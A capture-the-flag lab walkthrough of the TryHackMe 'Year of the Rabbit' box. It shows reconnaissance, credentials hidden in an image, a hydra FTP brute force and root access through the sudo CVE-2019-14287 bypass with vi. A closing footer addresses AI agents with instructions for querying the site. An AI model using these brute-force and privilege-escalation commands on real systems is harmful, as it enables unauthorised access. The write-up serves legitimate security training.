# Year of the Rabbit ![](/files/-Mbhqyp24gh_82Mj9kYK) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.165.1 ``` ![](/files/-MbhrgbjxqzIp8HOjPoV) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 21,22,80 * (**-oN nmap**): Saving it into a file called nmap ``` nmap -sV -sC -p 21,22,80 -oN nmap 10.10.165.1 ``` ![](/files/-MbhrjUURvLR8Te6PpPM) ## Enumeration Lets visit the webserver ![](/files/-Mbhs80zuo5C8DHFDTTr) It an apache2 default page, lets run gobuster to find hidden directories and pages. ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.165.1 ``` ![](/files/-MbhtOpsyEggQwM0oDFh) We found a directory called /assets lets go visit it. ![](/files/-MbhtfZG7rlUXZ7nmMCR) There are two files, lets check the first one which is a mp4 file , a video file. First we get a message telling us to turn off Javascript, followed by a redirection to a Rick Astley video . RICK ROLLED! Lets go turn off Javascript, Navigate to `about:config` in the browser and then search for Javascript, change the `javascript.enabled` parameter to false. ![](/files/-MbhvkGKYqTtBMEU0hut) Also looking at the other file, we need something interesting ![](/files/-Mbhw7EZm5Jo7vOWHBGQ) Lets visit this page. ![](/files/-MbhwK2TmjsJabmLM4hG) Listening through the audio, at second 56 we get the hint: "I'll put you out of your misery **burp** you're looking in the wrong place. Looking at this they are probably hinting to use `Burpsuite` so lets do that. Lets capture the request of visiting this page. After capturing the request and forwarding it once, you get something interesting ![](/files/-MbhxWhvv3F-yCqNVtvn) Its a directory, lets go visit it. ![](/files/-MbhyCSuatWuDxvFmPWo) There is one file, lets check it out ![](/files/-MbhyHlUNqB2OF5NME1l) Its a picture. Lets use our steganography skills to see if there is anything hidden in the picture. First we need to download the file, so lets do that. ``` wget http://10.10.165.1/WExYY2Cv-qU/Hot_Babe.png ``` ![](/files/-MbhymfyC0r93jKa84CV) Now lets use `steghide` and `binwalk` to see if we can find anything in this image. There was nothing, so l just used strings on the image. ``` strings Hot_Babe.png ``` Once I did this, I got some output and scrolling up a bit I got something interest ![](/files/-MbhzKkJrLQorFF69A2b) So we have a username and a password list, lets copy the password list to a file and use `hydra` to bruteforce ftp with the username and password list we have. I saved the password into a list called `passwords.lst` ## Exploitation ``` hydra -l ftpuser -P password.lst 10.10.165.1 ftp ``` ![](/files/-MbhzsPuJF87duApFJyJ) We found the password, lets login through ftp ``` ftp 10.10.165.1 ``` ![](/files/-Mbi-2UyDQ-BNZZcFkVj) We are logged in, lets list the files. ![](/files/-Mbi-8Na6SH2hvnaoCIV) Looks like there is a text file, lets transfer this to our machine ``` get Eli's_Creds.txt ``` ![](/files/-Mbi-QD92eyKyAZuJbUx) Lets read the file ![](/files/-Mbi-lJ_c1BzZmkf7RZf) I don't understand this code, so lets put it in a tool that does understand it. ![](/files/-Mbi0Fwt_1JmA8JMd6Qm) Now we have a password, lets use this to login through ssh with the username we found too. ``` ssh eli@10.10.165.1 ``` ![](/files/-Mbi0TxeZPxVd00QhZMT) We are logged in, we can see a message for us. We can find the user flag here but we are not allowed to read it. So we have to escalate privileges. ![](/files/-Mbi0iqcdCdmGiLFrndj) When we logged in, we see a message for us, there seems to be a `leet s3cr3t hiding place`, and there is a hidden message there waiting for us. Lets find it using this command. ``` find / -name s3cr3t 2>/dev/null ``` ![](/files/-Mbi1fssV7eiWUvgorwy) Its a directory so lets change directories into it. ``` cd /usr/games/s3cr3t ``` Lets list the files in the directory. ![](/files/-Mbi1wPFqQsHDirdFjdY) Lets read the this file ![](/files/-Mbi25WtEb56fE3O7KQO) Looks like we have the password to the user `Gwendoline` , so lets switch users. ``` su gwendoline ``` ![](/files/-Mbi7-rZ_aYYVpU4xdku) We can now read the `user.txt` file ![](/files/-Mbi7EVXwjv-xRdrEv3I) ## Privilege Escalation Lets run `sudo -l` to see what this user can run as root ``` sudo -l ``` ![](/files/-Mbi7VzIlTHk-lJZ2yT_) Looks like we can run `/usr/bin/vi /home/gwendoline/user.txt` as root, I found this [article ](https://www.whitesourcesoftware.com/resources/blog/new-vulnerability-in-sudo-cve-2019-14287/)that explains very well on what to do. First we use the command ``` sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt ``` And then we use this command ``` :!/bin/bash ``` And you are now root. ![](/files/-Mbi8h3eUTze56OzG-3b) We can read the root flag. ![](/files/-Mbi8ocIopv4bJINWTxL) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/year-of-the-rabbit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.